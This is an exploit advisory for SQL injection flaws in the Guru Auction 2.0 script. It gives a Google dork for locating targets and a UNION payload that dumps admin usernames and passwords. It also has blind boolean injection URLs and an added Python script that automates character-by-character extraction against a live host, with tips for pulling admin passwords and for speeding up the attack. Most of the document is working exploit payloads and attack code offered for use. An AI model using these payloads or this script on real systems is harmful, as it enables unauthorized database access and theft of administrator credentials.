Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
Author : v3n0m
Application : Guru Auction 2.0
Price : $49
Vendor : http://www.guruscript.com/
Google Dork : inurl:subcat.php?cate_id=
SQLi PoC:
~~~~~~~~~~
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--

The negative cate_id forces the original query to return no rows so only the injected UNION rows are rendered; char(58) is ':' and separates user_name from password in the group_concat output. Note that MySQL only treats "--" as a comment when it is followed by whitespace, so if the trailing "--" is the last thing in the URL use "--+" (or "-- -") instead.
Blind SQLi PoC:
~~~~~~~~~~
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false

item_id=575 must be an item that actually exists: the TRUE condition then renders the normal item page, the FALSE condition returns a different (empty or error) page, and the difference is the oracle. Comparing with a bare number only works for digit characters because MySQL coerces '5' to 5; for letters or punctuation compare against a hex literal such as 0x61 instead.
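The two requests above are one step of a boolean-based blind extraction; the script below, added here as an example and not part of the original advisory, automates it for the whole @@version string. It assumes the behaviour the PoC shows (TRUE condition returns the normal item page, FALSE returns something else); the host, path and item_id are placeholders, and make_simulated_oracle is a constructed stand-in for the vulnerable page so the script runs offline.

```python
"""Boolean-based blind extraction built on the detail.php PoC above.

Added example, not part of the original advisory. Assumes a TRUE condition
returns the unmodified item page and a FALSE one returns a different page.
BASE_URL and TRUE_ITEM are placeholders (assumptions)."""
import re
import string
import urllib.parse
import urllib.request

BASE_URL = "http://domain.tld/[path]/detail.php?item_id="  # placeholder
TRUE_ITEM = 575                                           # an item_id that exists
CHARSET = string.digits + string.ascii_letters + ".-_"


def build_payload(item_id, expr, pos, ch):
    """Same shape as the PoC, but the compared character is sent as a MySQL
    hex literal (0x35 for '5') so letters and punctuation work too and no
    quote characters are needed in the URL."""
    return "%d AND SUBSTRING(%s,%d,1)=0x%02x" % (item_id, expr, pos, ord(ch))


def make_http_oracle(base_url=BASE_URL, item_id=TRUE_ITEM, timeout=10):
    """Oracle against a live host: fetch the unmodified page once, then treat
    any byte-identical response as TRUE. Pages with dynamic content (dates,
    rotating banners) need a narrower check, e.g. presence of the item title."""
    def fetch(query):
        url = base_url + urllib.parse.quote(query, safe="")
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read()

    baseline = fetch(str(item_id))

    def oracle(payload):
        return fetch(payload) == baseline
    return oracle


def make_simulated_oracle(secret):
    """Constructed stand-in for the vulnerable page (offline use only): parses
    the payload and answers as MySQL would evaluate SUBSTRING(secret,pos,1)=0xNN.
    SUBSTRING past the end of the string is '' and matches nothing."""
    pat = re.compile(r"SUBSTRING\(.+?,(\d+),1\)=0x([0-9a-f]{2})$")

    def oracle(payload):
        m = pat.search(payload)
        if not m:
            return False
        pos, ch = int(m.group(1)), chr(int(m.group(2), 16))
        return pos <= len(secret) and secret[pos - 1] == ch
    return oracle


def extract(oracle, expr="@@version", charset=CHARSET, max_len=64):
    """Recover expr one character at a time, one request per candidate."""
    result = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            if oracle(build_payload(TRUE_ITEM, expr, pos, ch)):
                result += ch
                break
        else:
            # Nothing matched: end of string, or a character outside charset.
            break
    return result


if __name__ == "__main__":
    # Offline demo against the simulated page; swap in make_http_oracle()
    # to run the same loop against a live target.
    demo = make_simulated_oracle("5.0.51a-log")
    print(extract(demo))
```

Replacing @@version with another expression (for example a subquery selecting password from admin, with a LIMIT clause) extracts that value the same way, at one request per candidate character; a binary search on the character value cuts this to roughly seven requests per character.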
Admin login:
~~~~~~~~~~
http://domain.tld/[path]/admin/